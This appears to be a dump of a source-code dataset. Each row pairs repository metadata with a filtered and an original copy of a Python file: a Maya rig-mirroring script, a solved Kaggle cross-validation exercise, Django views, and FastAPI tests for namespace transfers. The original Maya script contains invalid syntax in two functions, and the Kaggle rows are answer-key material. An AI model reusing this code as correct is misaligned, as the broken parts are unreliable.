hexsha stringlengths 40 40 | size int64 7 1.04M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 4 247 | max_stars_repo_name stringlengths 4 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 368k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 247 | max_issues_repo_name stringlengths 4 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 247 | max_forks_repo_name stringlengths 4 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.04M | avg_line_length float64 1.77 618k | max_line_length int64 1 1.02M | alphanum_fraction float64 0 1 | original_content stringlengths 7 1.04M | filtered:remove_function_no_docstring int64 -102 942k | filtered:remove_class_no_docstring int64 -354 977k | filtered:remove_delete_markers int64 0 60.1k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
40ea8ef48a928fd6d21055d76899ad88cae9f033 | 219 | py | Python | transparentai_ui/app/models/modules/__init__.py | Nathanlauga/transparentai-ui | e15455d869099319c4ab60787890c2079af66b75 | [
"MIT"
] | 1 | 2020-06-18T08:53:46.000Z | 2020-06-18T08:53:46.000Z | transparentai_ui/app/models/modules/__init__.py | Nathanlauga/transparentai-ui | e15455d869099319c4ab60787890c2079af66b75 | [
"MIT"
] | null | null | null | transparentai_ui/app/models/modules/__init__.py | Nathanlauga/transparentai-ui | e15455d869099319c4ab60787890c2079af66b75 | [
"MIT"
] | 1 | 2021-11-23T22:59:54.000Z | 2021-11-23T22:59:54.000Z | from .pandas_profiling import ModulePandasProfiling
from .bias import ModuleBias
from .performance import ModulePerformance
from .interpretability import ModuleInterpretability
from .sustainable import ModuleSustainable | 43.8 | 52 | 0.890411 | from .pandas_profiling import ModulePandasProfiling
from .bias import ModuleBias
from .performance import ModulePerformance
from .interpretability import ModuleInterpretability
from .sustainable import ModuleSustainable | 0 | 0 | 0 |
f7394d7f4e15ee910ea725c70f43bd24a29bff59 | 638 | py | Python | niescraper/alarm.py | elKei24/niescraper | d26c2b6df7f1fa29633d6356023802e41c38721c | [
"MIT"
] | null | null | null | niescraper/alarm.py | elKei24/niescraper | d26c2b6df7f1fa29633d6356023802e41c38721c | [
"MIT"
] | null | null | null | niescraper/alarm.py | elKei24/niescraper | d26c2b6df7f1fa29633d6356023802e41c38721c | [
"MIT"
] | null | null | null | import asyncio
import importlib.resources
import aioconsole
from playsound import playsound
import niescraper.resources
| 25.52 | 83 | 0.749216 | import asyncio
import importlib.resources
import aioconsole
from playsound import playsound
import niescraper.resources
async def play_alarm():
with importlib.resources.path(niescraper.resources, 'alarm.mp3') as alarm_file:
while asyncio.get_running_loop().is_running():
playsound(alarm_file, False)
await asyncio.sleep(0.5)
async def play_alarm_until_input_async():
alarm_task = asyncio.create_task(play_alarm())
await aioconsole.ainput("Please press Enter to acknowledge alarm...")
alarm_task.cancel()
def play_alarm_until_input():
asyncio.run(play_alarm_until_input_async())
| 444 | 0 | 69 |
9fea2b873e177ec7678b8006a40ac7ca3d96746c | 2,691 | py | Python | Intermediate Machine Learning/Exercise 5.py | haoweii0215/Kaggle-Courses | 57974b2e6618b1125e030791320c649dda2fc783 | [
"MIT"
] | null | null | null | Intermediate Machine Learning/Exercise 5.py | haoweii0215/Kaggle-Courses | 57974b2e6618b1125e030791320c649dda2fc783 | [
"MIT"
] | null | null | null | Intermediate Machine Learning/Exercise 5.py | haoweii0215/Kaggle-Courses | 57974b2e6618b1125e030791320c649dda2fc783 | [
"MIT"
] | null | null | null | # Exercise 5 : Cross-Validation
## Set up code checking
import os
if not os.path.exists("../input/train.csv"):
os.symlink("../input/home-data-for-ml-course/train.csv", "../input/train.csv")
os.symlink("../input/home-data-for-ml-course/test.csv", "../input/test.csv")
from learntools.core import binder
binder.bind(globals())
from learntools.ml_intermediate.ex5 import *
print("Setup Complete")
import pandas as pd
from sklearn.model_selection import train_test_split
## Read the data
train_data = pd.read_csv('../input/train.csv', index_col='Id')
test_data = pd.read_csv('../input/test.csv', index_col='Id')
## Remove rows with missing target, separate target from predictors
train_data.dropna(axis=0, subset=['SalePrice'], inplace=True)
y = train_data.SalePrice
train_data.drop(['SalePrice'], axis=1, inplace=True)
## Select numeric columns only
numeric_cols = [cname for cname in train_data.columns if train_data[cname].dtype in ['int64', 'float64']]
X = train_data[numeric_cols].copy()
X_test = test_data[numeric_cols].copy()
## Step 1: Write a useful function
## In this exercise, you'll use cross-validation to select parameters for a machine learning model.
## Begin by writing a function get_score() that reports the average (over three cross-validation folds) MAE of a machine learning pipeline that uses:
## the data in X and y to create folds,
## SimpleImputer() (with all parameters left as default) to replace missing values, and
## RandomForestRegressor() (with random_state=0) to fit a random forest model.
## The n_estimators parameter supplied to get_score() is used when setting the number of trees in the random forest model.
## Answer:
## Step 2: Test different parameter values
## Now, you will use the function that you defined in Step 1 to evaluate the model performance corresponding to eight different values for the number of trees in the random forest: 50, 100, 150, ..., 300, 350, 400.
## Store your results in a Python dictionary results, where results[i] is the average MAE returned by get_score(i).
## Answer:
results = {}
for i in range(1,9):
results[50*i] = get_score(50*i)
## Step 3: Find the best parameter value
## Given the results, which value for n_estimators seems best for the random forest model? Use your answer to set the value of n_estimators_best.
## Answer:
n_estimators_best = min(results, key=results.get) | 43.403226 | 214 | 0.73913 | # Exercise 5 : Cross-Validation
## Set up code checking
import os
if not os.path.exists("../input/train.csv"):
os.symlink("../input/home-data-for-ml-course/train.csv", "../input/train.csv")
os.symlink("../input/home-data-for-ml-course/test.csv", "../input/test.csv")
from learntools.core import binder
binder.bind(globals())
from learntools.ml_intermediate.ex5 import *
print("Setup Complete")
import pandas as pd
from sklearn.model_selection import train_test_split
## Read the data
train_data = pd.read_csv('../input/train.csv', index_col='Id')
test_data = pd.read_csv('../input/test.csv', index_col='Id')
## Remove rows with missing target, separate target from predictors
train_data.dropna(axis=0, subset=['SalePrice'], inplace=True)
y = train_data.SalePrice
train_data.drop(['SalePrice'], axis=1, inplace=True)
## Select numeric columns only
numeric_cols = [cname for cname in train_data.columns if train_data[cname].dtype in ['int64', 'float64']]
X = train_data[numeric_cols].copy()
X_test = test_data[numeric_cols].copy()
## Step 1: Write a useful function
## In this exercise, you'll use cross-validation to select parameters for a machine learning model.
## Begin by writing a function get_score() that reports the average (over three cross-validation folds) MAE of a machine learning pipeline that uses:
## the data in X and y to create folds,
## SimpleImputer() (with all parameters left as default) to replace missing values, and
## RandomForestRegressor() (with random_state=0) to fit a random forest model.
## The n_estimators parameter supplied to get_score() is used when setting the number of trees in the random forest model.
## Answer:
def get_score(n_estimators):
my_pipeline = Pipeline(steps=[
('preprocessor', SimpleImputer()),
('model', RandomForestRegressor(n_estimators, random_state=0))
])
scores = -1 * cross_val_score(my_pipeline, X, y, cv=3, scoring='neg_mean_absolute_error')
return scores.mean()
## Step 2: Test different parameter values
## Now, you will use the function that you defined in Step 1 to evaluate the model performance corresponding to eight different values for the number of trees in the random forest: 50, 100, 150, ..., 300, 350, 400.
## Store your results in a Python dictionary results, where results[i] is the average MAE returned by get_score(i).
## Answer:
results = {}
for i in range(1,9):
results[50*i] = get_score(50*i)
## Step 3: Find the best parameter value
## Given the results, which value for n_estimators seems best for the random forest model? Use your answer to set the value of n_estimators_best.
## Answer:
n_estimators_best = min(results, key=results.get) | 282 | 0 | 22 |
a66eb3e3423ecbe7d1fa55c112056c2996c31103 | 7,210 | py | Python | modules/rig.py | Noorth34/barakaTools | c87361a284ab6b410f4957794d022cb07ea216ff | [
"CC0-1.0"
] | null | null | null | modules/rig.py | Noorth34/barakaTools | c87361a284ab6b410f4957794d022cb07ea216ff | [
"CC0-1.0"
] | null | null | null | modules/rig.py | Noorth34/barakaTools | c87361a284ab6b410f4957794d022cb07ea216ff | [
"CC0-1.0"
] | null | null | null | # coding:utf-8
# real mirror script
# 1) duplicate special ( world | input graph)
# 2) unparent offsets to world
# 3) create a null for each offset
# 4) match Translate each null on his respective offset
# 5) *(-1) translate X on each null
# 6) rotation 180° on Y and Z axis on each null
# 7) unparent offsets and reparent them correctly
# 8) reorient CTRLS' shapes
# /|\
# / ! \ *(-1) translate X on each null joint
#
# MIRROR RIG MODULES
sel = cmds.ls(sl=True, ap=True)
duplicata = cmds.duplicate(sel, returnRootsOnly=False, rc=True, upstreamNodes=True)
# rename ALL nodes ; both DAG and DG nodes
renamed_duplicata = []
for node in duplicata:
renamed_node = cmds.rename(node, node.replace("_L", "_R").rstrip("1"))
renamed_duplicata.append(renamed_node)
# Save constraint structure
constraints_list = []
for node in renamed_duplicata:
if cmds.objectType(node) in ["parentConstraint", "orientConstraint", "scaleConstraint", "aimConstraint"]:
constraints_list.append(node)
if constraints_list:
constraint = {}
for constr in constraints_list:
constraint[constr] = {}
constraint[constr]["type"] = cmds.objectType(constr)
id = 0
constraint[constr]["source"] = None
while not constraint[constr]["source"]:
constraint[constr]["source"] = cmds.listConnections(constr+".target[{}].targetParentMatrix".format(id), s=True, d=False)
id += 1
constraint[constr]["source"] = constraint[constr]["source"][0]
dest_tx = cmds.listConnections("{}.constraintTranslateX".format(constr), s=False, d=True)[0]
dest_ty = cmds.listConnections("{}.constraintTranslateY".format(constr), s=False, d=True)[0]
dest_tz = cmds.listConnections("{}.constraintTranslateZ".format(constr), s=False, d=True)[0]
dest_rx = cmds.listConnections("{}.constraintRotateX".format(constr), s=False, d=True)[0]
dest_ry = cmds.listConnections("{}.constraintRotateY".format(constr), s=False, d=True)[0]
dest_rz = cmds.listConnections("{}.constraintRotateZ".format(constr), s=False, d=True)[0]
if dest_tx == dest_ty and dest_ty == dest_tz:
constraint[constr]["destination"] = dest_tx
elif dest_rx == dest_ry and dest_ry == dest_rz:
constraint[constr]["destination"] = dest_rx
offset_tr = cmds.getAttr("{}.target[0].targetOffsetTranslate".format(constr))[0]
offset_rot = cmds.getAttr("{}.target[0].targetOffsetRotate".format(constr))[0]
if offset_tr == (0, 0, 0) and offset_rot == (0, 0, 0):
constraint[constr]["maintain_offset"] = False
else:
constraint[constr]["maintain_offset"] = True
cmds.delete(constr)
# Work only with DAG nodes
cmds.select(renamed_duplicata[0:len(sel)], hierarchy=True)
dagNodes_list = cmds.ls(sl=True, shapes=False)
# filter shapes because maya sucks
for id, node in enumerate(dagNodes_list):
if cmds.objectType(node, isType="nurbsCurve") == True:
dagNodes_list.pop(id)
dagParent = {}
for node in dagNodes_list:
parent = cmds.listRelatives(node, parent=True)[0]
dagParent[node] = parent
if cmds.objectType(node, isType="joint") and node.startswith("null_"):
jpos_x, jpos_y, jpos_z = cmds.xform(node, q=True, t=True, objectSpace=True)
for node in dagNodes_list:
cmds.parent(node, world=True)
for node in dagNodes_list:
pos_x, pos_y, pos_z = cmds.xform(node, q=True, t=True)
rot_x, rot_y, rot_z = cmds.xform(node, q=True, ro=True)
global_move = cmds.createNode("transform", n="temp_mirror")
cmds.xform(global_move, t=[pos_x, pos_y, pos_z])
cmds.parent(node, global_move)
cmds.xform(global_move, t=[-pos_x, pos_y, pos_z])
cmds.xform(global_move, ro=[0, 180, 180])
cmds.parent(node, w=True)
cmds.delete(global_move)
for node in dagNodes_list:
cmds.parent(node, dagParent[node])
if cmds.objectType(node, isType="joint"):
if node.startswith("null_"):
cmds.xform(node, t=[-jpos_x, jpos_y, jpos_z])
cmds.setAttr("{}.jointOrientX".format(node), 0)
cmds.setAttr("{}.jointOrientY".format(node), 0)
cmds.setAttr("{}.jointOrientZ".format(node), 0)
# redo constraints
if constraints_list:
for i in constraints_list:
if constraint[i]["type"] == "parentConstraint":
cmds.parentConstraint(constraint[i]["source"], constraint[i]["destination"], mo= constraint[i]["maintain_offset"])
elif constraint[i]["type"] == "orientConstraint":
cmds.orientConstraint(constraint[i]["source"], constraint[i]["destination"], mo= constraint[i]["maintain_offset"])
elif constraint[i]["type"] == "scaleConstraint":
cmds.scaleConstraint(constraint[i]["source"], constraint[i]["destination"], mo= constraint[i]["maintain_offset"])
# elif constraint[i]["type"] == "aimConstraint":
# cmds.aimConstraint(constraint[i]["source"], constraint[i]["destination"], mo= constraint[i]["maintain_offset"])
# MIRROR POSITION AND ROTATION
# MIRROR SHAPES
if not sel:
sel = cmds.ls(sl=True, ap=True)
if not sel:
cmds.error("Any selection. Please select curves")
for transform in sel:
shapes_list = cmds.listRelatives(transform, shapes=True, path=True)
for shape in shapes_list:
if cmds.objectType(shape, isType="nurbsCurve"):
cv_number = cmds.getAttr("{}.spans".format(shape))
for id in range(cv_number):
cv_x = cmds.getAttr("{}.controlPoints[{}].xValue".format(shape, id))
cv_y = cmds.getAttr("{}.controlPoints[{}].yValue".format(shape, id))
cv_z = cmds.getAttr("{}.controlPoints[{}].zValue".format(shape, id))
cmds.setAttr("{}.controlPoints[{}].xValue".format(shape, id), cv_x)
cmds.setAttr("{}.controlPoints[{}].yValue".format(shape, id), (-1)*cv_y)
cmds.setAttr("{}.controlPoints[{}].zValue".format(shape, id), (-1)*cv_z)
| 32.331839 | 123 | 0.697642 | # coding:utf-8
# real mirror script
# 1) duplicate special ( world | input graph)
# 2) unparent offsets to world
# 3) create a null for each offset
# 4) match Translate each null on his respective offset
# 5) *(-1) translate X on each null
# 6) rotation 180° on Y and Z axis on each null
# 7) unparent offsets and reparent them correctly
# 8) reorient CTRLS' shapes
# /|\
# / ! \ *(-1) translate X on each null joint
#
# MIRROR RIG MODULES
sel = cmds.ls(sl=True, ap=True)
duplicata = cmds.duplicate(sel, returnRootsOnly=False, rc=True, upstreamNodes=True)
# rename ALL nodes ; both DAG and DG nodes
renamed_duplicata = []
for node in duplicata:
renamed_node = cmds.rename(node, node.replace("_L", "_R").rstrip("1"))
renamed_duplicata.append(renamed_node)
# Save constraint structure
constraints_list = []
for node in renamed_duplicata:
if cmds.objectType(node) in ["parentConstraint", "orientConstraint", "scaleConstraint", "aimConstraint"]:
constraints_list.append(node)
if constraints_list:
constraint = {}
for constr in constraints_list:
constraint[constr] = {}
constraint[constr]["type"] = cmds.objectType(constr)
id = 0
constraint[constr]["source"] = None
while not constraint[constr]["source"]:
constraint[constr]["source"] = cmds.listConnections(constr+".target[{}].targetParentMatrix".format(id), s=True, d=False)
id += 1
constraint[constr]["source"] = constraint[constr]["source"][0]
dest_tx = cmds.listConnections("{}.constraintTranslateX".format(constr), s=False, d=True)[0]
dest_ty = cmds.listConnections("{}.constraintTranslateY".format(constr), s=False, d=True)[0]
dest_tz = cmds.listConnections("{}.constraintTranslateZ".format(constr), s=False, d=True)[0]
dest_rx = cmds.listConnections("{}.constraintRotateX".format(constr), s=False, d=True)[0]
dest_ry = cmds.listConnections("{}.constraintRotateY".format(constr), s=False, d=True)[0]
dest_rz = cmds.listConnections("{}.constraintRotateZ".format(constr), s=False, d=True)[0]
if dest_tx == dest_ty and dest_ty == dest_tz:
constraint[constr]["destination"] = dest_tx
elif dest_rx == dest_ry and dest_ry == dest_rz:
constraint[constr]["destination"] = dest_rx
offset_tr = cmds.getAttr("{}.target[0].targetOffsetTranslate".format(constr))[0]
offset_rot = cmds.getAttr("{}.target[0].targetOffsetRotate".format(constr))[0]
if offset_tr == (0, 0, 0) and offset_rot == (0, 0, 0):
constraint[constr]["maintain_offset"] = False
else:
constraint[constr]["maintain_offset"] = True
cmds.delete(constr)
# Work only with DAG nodes
cmds.select(renamed_duplicata[0:len(sel)], hierarchy=True)
dagNodes_list = cmds.ls(sl=True, shapes=False)
# filter shapes because maya sucks
for id, node in enumerate(dagNodes_list):
if cmds.objectType(node, isType="nurbsCurve") == True:
dagNodes_list.pop(id)
dagParent = {}
for node in dagNodes_list:
parent = cmds.listRelatives(node, parent=True)[0]
dagParent[node] = parent
if cmds.objectType(node, isType="joint") and node.startswith("null_"):
jpos_x, jpos_y, jpos_z = cmds.xform(node, q=True, t=True, objectSpace=True)
for node in dagNodes_list:
cmds.parent(node, world=True)
for node in dagNodes_list:
pos_x, pos_y, pos_z = cmds.xform(node, q=True, t=True)
rot_x, rot_y, rot_z = cmds.xform(node, q=True, ro=True)
global_move = cmds.createNode("transform", n="temp_mirror")
cmds.xform(global_move, t=[pos_x, pos_y, pos_z])
cmds.parent(node, global_move)
cmds.xform(global_move, t=[-pos_x, pos_y, pos_z])
cmds.xform(global_move, ro=[0, 180, 180])
cmds.parent(node, w=True)
cmds.delete(global_move)
for node in dagNodes_list:
cmds.parent(node, dagParent[node])
if cmds.objectType(node, isType="joint"):
if node.startswith("null_"):
cmds.xform(node, t=[-jpos_x, jpos_y, jpos_z])
cmds.setAttr("{}.jointOrientX".format(node), 0)
cmds.setAttr("{}.jointOrientY".format(node), 0)
cmds.setAttr("{}.jointOrientZ".format(node), 0)
# redo constraints
if constraints_list:
for i in constraints_list:
if constraint[i]["type"] == "parentConstraint":
cmds.parentConstraint(constraint[i]["source"], constraint[i]["destination"], mo= constraint[i]["maintain_offset"])
elif constraint[i]["type"] == "orientConstraint":
cmds.orientConstraint(constraint[i]["source"], constraint[i]["destination"], mo= constraint[i]["maintain_offset"])
elif constraint[i]["type"] == "scaleConstraint":
cmds.scaleConstraint(constraint[i]["source"], constraint[i]["destination"], mo= constraint[i]["maintain_offset"])
# elif constraint[i]["type"] == "aimConstraint":
# cmds.aimConstraint(constraint[i]["source"], constraint[i]["destination"], mo= constraint[i]["maintain_offset"])
# MIRROR POSITION AND ROTATION
def mirror_object(objects_list=[], axis="x"):
if not objects_list:
cmds.error("Any objects passed for mirror.")
if objects_list not type(list):
objects = list(objects)
for obj in objects_list:
pos_x, pos_y, pos_z = cmds.xform(obj, q=True, t=True)
rot_x, rot_y, rot_z = cmds.xform(obj, q=True, ro=True)
global_move = cmds.createNode("transform", n="temp_mirror")
cmds.xform(global_move, t=[pos_x, pos_y, pos_z])
cmds.parent(obj, global_move)
if axis == "x":
cmds.xform(global_move, t=[(-1)*pos_x, pos_y, pos_z])
cmds.xform(global_move, ro=[0, 180, 180])
if axis == "y":
cmds.xform(global_move, t=[pos_x, (-1)*pos_y, pos_z])
cmds.xform(global_move, ro=[180, 0, 180])
if axis == "z":
cmds.xform(global_move, t=[pos_x, pos_y, (-1)*pos_z])
cmds.xform(global_move, ro=[180, 180, 0])
cmds.parent(obj, w=True)
cmds.delete(global_move)
# MIRROR SHAPES
def mirror_curve_shape(sel=[])
if sel not type(list):
cmds.error("{} passed. Must pass selection list".format(type(sel)))
if not sel:
sel = cmds.ls(sl=True, ap=True)
if not sel:
cmds.error("Any selection. Please select curves")
for transform in sel:
shapes_list = cmds.listRelatives(transform, shapes=True, path=True)
for shape in shapes_list:
if cmds.objectType(shape, isType="nurbsCurve"):
cv_number = cmds.getAttr("{}.spans".format(shape))
for id in range(cv_number):
cv_x = cmds.getAttr("{}.controlPoints[{}].xValue".format(shape, id))
cv_y = cmds.getAttr("{}.controlPoints[{}].yValue".format(shape, id))
cv_z = cmds.getAttr("{}.controlPoints[{}].zValue".format(shape, id))
cmds.setAttr("{}.controlPoints[{}].xValue".format(shape, id), cv_x)
cmds.setAttr("{}.controlPoints[{}].yValue".format(shape, id), (-1)*cv_y)
cmds.setAttr("{}.controlPoints[{}].zValue".format(shape, id), (-1)*cv_z)
def hook_legacy():
sel = cmds.ls(sl=True, ap=True)
hook = cmds.createNode("transform", n= "hook_{}_for_{}".format( sel[0], sel[-1] ) )
cmds.setAttr("{}.useOutlinerColor".format(hook), 1)
cmds.setAttr("{}.outlinerColorR".format(hook), 0)
cmds.setAttr("{}.outlinerColorG".format(hook), 1)
cmds.setAttr("{}.outlinerColorB".format(hook), 1)
cmds.parentConstraint(sel[0], hook, mo=False)
cmds.scaleConstraint(sel[0], hook, mo=False)
parent = cmds.listRelatives(sel[-1], parent=True, path=True)
cmds.parent(sel[-1], hook)
if parent:
parent = parent[0]
cmds.parent(hook, parent)
else:
pass | 1,550 | 0 | 69 |
2fdcf9b4a72c56e2caf1881dd37ca30b320f2f35 | 318 | py | Python | api/constants.py | Xavier-Cliquennois/ac-mediator | ce55b65ab7f4532fc11fbb2f994518c60240bfdc | [
"Apache-2.0"
] | 9 | 2016-11-17T08:04:01.000Z | 2020-09-10T05:58:36.000Z | api/constants.py | Xavier-Cliquennois/ac-mediator | ce55b65ab7f4532fc11fbb2f994518c60240bfdc | [
"Apache-2.0"
] | 23 | 2016-10-26T14:43:55.000Z | 2021-06-10T20:02:38.000Z | api/constants.py | Xavier-Cliquennois/ac-mediator | ce55b65ab7f4532fc11fbb2f994518c60240bfdc | [
"Apache-2.0"
] | 3 | 2018-03-03T12:07:28.000Z | 2020-08-02T12:54:31.000Z | QUERY_PARAM_QUERY = 'q'
QUERY_PARAM_SORT = 's'
QUERY_PARAM_FILTER = 'f'
QUERY_PARAM_SIZE = 'size'
QUERY_PARAM_PAGE = 'page'
QUERY_PARAM_FIELDS = 'fields'
QUERY_PARAM_OFFSET = 'offset'
QUERY_PARAM_INCLUDE = 'include'
QUERY_PARAM_EXCLUDE = 'exclude'
QUERY_PARAM_WAIT_UNTIL_COMPLETE = 'wuc'
QUERY_PARAM_FORMAT = 'format'
| 26.5 | 39 | 0.792453 | QUERY_PARAM_QUERY = 'q'
QUERY_PARAM_SORT = 's'
QUERY_PARAM_FILTER = 'f'
QUERY_PARAM_SIZE = 'size'
QUERY_PARAM_PAGE = 'page'
QUERY_PARAM_FIELDS = 'fields'
QUERY_PARAM_OFFSET = 'offset'
QUERY_PARAM_INCLUDE = 'include'
QUERY_PARAM_EXCLUDE = 'exclude'
QUERY_PARAM_WAIT_UNTIL_COMPLETE = 'wuc'
QUERY_PARAM_FORMAT = 'format'
| 0 | 0 | 0 |
5dad6baf371de22cb47baf42c155ab90f5fc6fbb | 780 | py | Python | read/views.py | MaryMbugua/Tusome | 4a6b8bf20644953977d91cda6ad299d12b93a934 | [
"MIT"
] | 1 | 2018-06-25T20:22:31.000Z | 2018-06-25T20:22:31.000Z | read/views.py | MaryMbugua/Tusome | 4a6b8bf20644953977d91cda6ad299d12b93a934 | [
"MIT"
] | null | null | null | read/views.py | MaryMbugua/Tusome | 4a6b8bf20644953977d91cda6ad299d12b93a934 | [
"MIT"
] | null | null | null | from django.shortcuts import render,redirect
from django.http import HttpResponse,Http404,HttpResponseRedirect
from django.contrib.auth.decorators import login_required
from .models import Enquiry,Vitabu
from .forms import EnquiryForm
# Create your views here. | 30 | 65 | 0.7 | from django.shortcuts import render,redirect
from django.http import HttpResponse,Http404,HttpResponseRedirect
from django.contrib.auth.decorators import login_required
from .models import Enquiry,Vitabu
from .forms import EnquiryForm
# Create your views here.
def welcome(request):
books = Vitabu.objects.all()
return render(request,'index.html',{"books":books})
def about(request):
return render(request,'about.html')
def contribute(request):
form = EnquiryForm(request.POST,request.FILES)
if request.method == 'POST':
if form.is_valid():
enquiry = form.save()
enquiry.save()
print("Message succesfully sent!")
else:
form = EnquiryForm()
return render(request,'contribute.html',{"form":form}) | 451 | 0 | 68 |
049ab880e018f48145c50061ce27bad3fd3238f4 | 22,531 | py | Python | src/tests/test_namespace2projecttransfer.py | scraiber/scraiber-api | 010d0875ba0820e0ec7790d74df8a2955fac360e | [
"Apache-2.0"
] | 1 | 2022-03-29T06:41:41.000Z | 2022-03-29T06:41:41.000Z | src/tests/test_namespace2projecttransfer.py | scraiber/scraiber-api | 010d0875ba0820e0ec7790d74df8a2955fac360e | [
"Apache-2.0"
] | null | null | null | src/tests/test_namespace2projecttransfer.py | scraiber/scraiber-api | 010d0875ba0820e0ec7790d74df8a2955fac360e | [
"Apache-2.0"
] | null | null | null | import time
import uuid
from kubernetes import client, config
import os
from fastapi.testclient import TestClient
import json
from typing import List
from pydantic import EmailStr
from fastapi import HTTPException
from app.api.models.auth0 import Auth0User
from .helper_functions import (
generate_user,
generate_project,
generate_namespace
)
from app.main import app
from app.auth0 import current_user
cluster_name = json.loads(os.environ['CLUSTER_DICT'])["EU1"]["Config-Name"]
config.load_kube_config("config.yaml", context=cluster_name)
v1 = client.CoreV1Api()
rbac = client.RbacAuthorizationV1Api()
user1 = generate_user()
user2 = generate_user()
user3 = generate_user()
user_list1 = [user1, user2, user3]
namespace_blacklist = generate_namespace()
namespace_blacklist.update({"name": "default"})
namespace1 = generate_namespace()
namespace2 = generate_namespace()
namespace3 = generate_namespace()
project = generate_project()
project2 = generate_project()
project3 = generate_project()
| 53.014118 | 130 | 0.712441 | import time
import uuid
from kubernetes import client, config
import os
from fastapi.testclient import TestClient
import json
from typing import List
from pydantic import EmailStr
from fastapi import HTTPException
from app.api.models.auth0 import Auth0User
from .helper_functions import (
generate_user,
generate_project,
generate_namespace
)
from app.main import app
from app.auth0 import current_user
cluster_name = json.loads(os.environ['CLUSTER_DICT'])["EU1"]["Config-Name"]
config.load_kube_config("config.yaml", context=cluster_name)
v1 = client.CoreV1Api()
rbac = client.RbacAuthorizationV1Api()
user1 = generate_user()
user2 = generate_user()
user3 = generate_user()
user_list1 = [user1, user2, user3]
namespace_blacklist = generate_namespace()
namespace_blacklist.update({"name": "default"})
namespace1 = generate_namespace()
namespace2 = generate_namespace()
namespace3 = generate_namespace()
async def get_user_by_email(email: EmailStr) -> Auth0User:
for user in user_list1:
if user.email == email:
return user
raise HTTPException(status_code=404, detail="User could not be retrieved")
async def get_user_by_id(id: str) -> Auth0User:
for user in user_list1:
if user.user_id == id:
return user
raise HTTPException(status_code=404, detail="User could not be retrieved")
async def get_user_list_by_id(id_list: List[str], require_200_status_code: bool = False) -> List[Auth0User]:
output_list = []
for user in user_list1:
if user.user_id in id_list:
output_list.append(user)
return output_list
project = generate_project()
project2 = generate_project()
project3 = generate_project()
def test_transfer_candidate_add(client: TestClient, session, monkeypatch):
monkeypatch.setattr("app.api.routes.user_management.get_user_by_email", get_user_by_email)
monkeypatch.setattr("app.api.routes.user_management.get_user_by_id", get_user_by_id)
monkeypatch.setattr("app.api.routes.namespaces.get_user_by_id", get_user_by_id)
monkeypatch.setattr("app.api.routes.namespaces.get_user_list_by_id", get_user_list_by_id)
monkeypatch.setattr("app.api.routes.namespace2projecttransfer.get_user_list_by_id", get_user_list_by_id)
#create project 1
app.dependency_overrides[current_user] = lambda: user1
response = client.post('projects/', data=json.dumps(project))
project.update({"project_id": response.json()["project_id"]})
#create project 2
response = client.post('projects/', data=json.dumps(project2))
project2.update({"project_id": response.json()["project_id"]})
response = client.post('projects/', data=json.dumps(project3))
project3.update({"project_id": response.json()["project_id"]})
response = client.post('project_user_management/',
data=json.dumps({"project_id": project["project_id"], "e_mail": user2.email}))
response = client.post('project_user_management/',
data=json.dumps({"project_id": project2["project_id"], "e_mail": user3.email}))
app.dependency_overrides[current_user] = lambda: user2
response = client.post('project_user_management/accept_user_invitation',
data=json.dumps({"project_id": project["project_id"]}))
app.dependency_overrides[current_user] = lambda: user3
response = client.post('project_user_management/accept_user_invitation',
data=json.dumps({"project_id": project2["project_id"]}))
app.dependency_overrides[current_user] = lambda: user1
namespace1.update({"project_id": project["project_id"]})
response = client.post("namespaces/", data=json.dumps(namespace1))
namespace2.update({"project_id": project["project_id"]})
response = client.post("namespaces/", data=json.dumps(namespace2))
namespace3.update({"project_id": project["project_id"]})
response = client.post("namespaces/", data=json.dumps(namespace3))
data = {"name": namespace1["name"], "region": namespace1["region"], "old_project_id": project["project_id"],
"new_project_id": project2["project_id"]}
app.dependency_overrides[current_user] = lambda: user1.copy(update={"is_verified": False})
response = client.post('namespace2projecttransfer/', data=json.dumps(data))
assert response.status_code == 401
assert response.json()["detail"] == "User e-mail not verified"
app.dependency_overrides[current_user] = lambda: user2
response = client.post('namespace2projecttransfer/', data=json.dumps(data))
assert response.status_code == 401
assert response.json()["detail"] == "Project for user not found or user not admin"
app.dependency_overrides[current_user] = lambda: user1
data_nonsense = {"name": namespace1["name"], "region": namespace1["region"], "old_project_id": project["project_id"],
"new_project_id": str(uuid.uuid4())}
response = client.post('namespace2projecttransfer/', data=json.dumps(data_nonsense))
assert response.status_code == 404
assert response.json()["detail"] == "Target project not found"
data_nonsense = {"name": "nonsense", "region": namespace1["region"], "old_project_id": project["project_id"],
"new_project_id": project2["project_id"]}
response = client.post('namespace2projecttransfer/', data=json.dumps(data_nonsense))
assert response.status_code == 404
assert response.json()["detail"] == "Namespace not found"
data_nonsense = {"name": namespace1["name"], "region": namespace1["region"], "old_project_id": project2["project_id"],
"new_project_id": project["project_id"]}
response = client.post('namespace2projecttransfer/', data=json.dumps(data_nonsense))
assert response.status_code == 403
assert response.json()["detail"] == "Namespace not associated to source project"
session.execute("SELECT COUNT(*) FROM public.namespaces WHERE project_id='" + project["project_id"] + "'")
assert session.fetchone()[0] == 3
session.execute("SELECT COUNT(*) FROM public.namespace2projecttransfer WHERE old_project_id='" + project["project_id"] + "'")
assert session.fetchone()[0] == 0
session.execute("SELECT COUNT(*) FROM public.namespace2projecttransfer WHERE new_project_id='" + project2["project_id"] + "'")
assert session.fetchone()[0] == 0
session.execute("SELECT COUNT(*) FROM public.namespaces WHERE project_id='" + project2["project_id"] + "'")
assert session.fetchone()[0] == 0
response = client.post('namespace2projecttransfer/', data=json.dumps(data))
assert response.status_code == 201
assert response.json() == data
